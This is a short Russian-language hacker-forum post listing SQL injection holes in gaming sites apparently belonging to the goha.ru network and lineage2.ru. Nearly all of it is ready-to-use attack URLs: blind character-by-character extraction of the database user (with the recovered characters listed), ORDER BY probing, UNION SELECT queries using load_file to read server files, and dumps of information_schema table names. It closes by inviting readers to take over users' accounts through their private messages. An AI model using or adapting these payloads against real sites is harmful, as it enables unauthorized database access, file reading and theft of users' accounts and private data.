краткий обзор багов гохи:
1) посимвольный брут с этого нс:
Код:
http://wow.ru/c/pagecont/?id=2241+and+ascii(lower(substring(user(),4,1)))%3C=97
Код:
1-103 g
2-111 o
3-104 h
4-97 a
5-95 _
6-103 g
7-111 o
8-104 h
9-97 a
10-115 s
11-64 @
12 49 1
...
2)reverse-ip=>
Код:
http://news.goha.ru/c/pagecont/?id=2217+order+by+4/*
-//-
3)однако, есть и не посимвольный брут, причем где то ковычки фильтруются:
Код:
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+load_file('/lala'),2,3,4+from+information_schema.tables/*
4).. а где то нет:
Код:
http://www.list.goha.ru/suggest-link.php?id=0'+union+select+1,load_file('/lala'),3,4,5,6,7,8,9,10,11,12,13,14,15/*
или даже так (вывод в исходниках):
Код:
http://eq2.goha.ru/c/pagecat/show_image/?action=show_image&id=999+union+select+concat(0x3b,table_name,table_schema),2,3,4+from+information_schema.tables/*
6)причем бага с посимвольным брутом распостранена на нескольких ресурсах гохи:
Код:
http://lineage2.ru/c/pagecont/?id=2761-1
сколько акков с оффа можно увести, получив доступ к личкам пользователей - решать вам, и помните о неправомерном доступе к закрытой информации=).